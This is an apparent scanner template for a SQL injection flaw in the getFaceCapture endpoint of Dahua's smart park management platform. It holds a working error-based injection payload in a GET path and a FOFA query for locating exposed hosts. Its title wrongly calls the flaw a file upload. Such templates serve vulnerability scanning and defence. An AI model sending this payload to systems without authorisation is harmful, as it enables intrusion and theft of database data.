id: dahua-zhyq-getfacecapture-sqli

info:
  name: 大华 智慧园区综合管理平台 video 任意文件上传漏洞
  author: peiqi
  severity: high
  verified: true
  description: |
    大华 智慧园区综合管理平台 getFaceCapture 接口存在SQL注入漏洞，攻击者通过漏洞可以执行任意SQL语句，获取数据库敏感信息
    FOFA: app="dahua-智慧园区综合管理平台"
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/大华/大华%20智慧园区综合管理平台%20getFaceCapture%20SQL注入漏洞.html
  tags: dahua,sqli
  created: 2023/08/13

rules:
  r0:
    request:
      method: GET
      path: /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123123)),0x7e),1)--%22%7D/extend/%7B%7D
    expression: response.status == 500 && response.body.bcontains(b'4297f44b13955235245b2497399d7a9')
expression: r0()